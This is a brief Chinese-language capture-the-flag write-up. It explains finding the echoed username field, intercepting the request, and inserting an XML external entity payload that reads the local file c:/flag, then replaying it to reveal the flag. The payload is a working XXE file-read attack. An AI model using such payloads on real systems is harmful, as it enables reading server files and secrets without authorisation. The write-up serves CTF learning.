随便树一点查看回显点,为username 抓包 做如下修改 <!DOCTYPE user[<!ENTITY xxx SYSTEM "file:///c:/flag" > ]> &xxx; 仍到重放器运行发现flag